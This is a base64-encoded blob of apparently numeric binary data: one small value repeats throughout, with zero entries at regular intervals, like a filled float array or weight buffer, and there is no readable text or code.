JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fi
U8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8t
X4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4l
PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV
+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPL